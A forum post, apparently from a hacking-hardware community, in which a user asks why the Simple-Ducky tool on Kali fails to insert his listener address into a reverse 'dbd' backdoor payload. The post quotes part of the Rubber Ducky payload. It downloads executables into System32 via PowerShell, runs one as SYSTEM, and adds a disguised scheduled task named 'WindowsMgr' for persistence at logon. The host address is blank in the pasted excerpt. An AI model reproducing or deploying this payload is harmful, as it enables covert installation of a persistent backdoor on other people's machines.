Jump to content

Simple-ducky dbd payload issue not getting input from user


jjd

Recommended Posts

I'm using Kali to create my payload and having a few issued. I'm trying a rev dbd and simple-ducky does not seem to be doing anything with my input. when it asks for my rev address and port i enter them then when it asks for my website i enter that and when it asks if i want to start listening I say yes and get two errors.

chmod: cannot access `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory
cp: cannot stat `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory
listening on port 1331

and it does not enter my input into the payload.

relevant part of payload:

STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///winmgnt.txt','%WINDIR%\System32\winmgnt.exe')
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe')
ENTER
STRING %WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe
ENTER
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" 

anyone got any ideas? is it something with my install?

thanks!

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...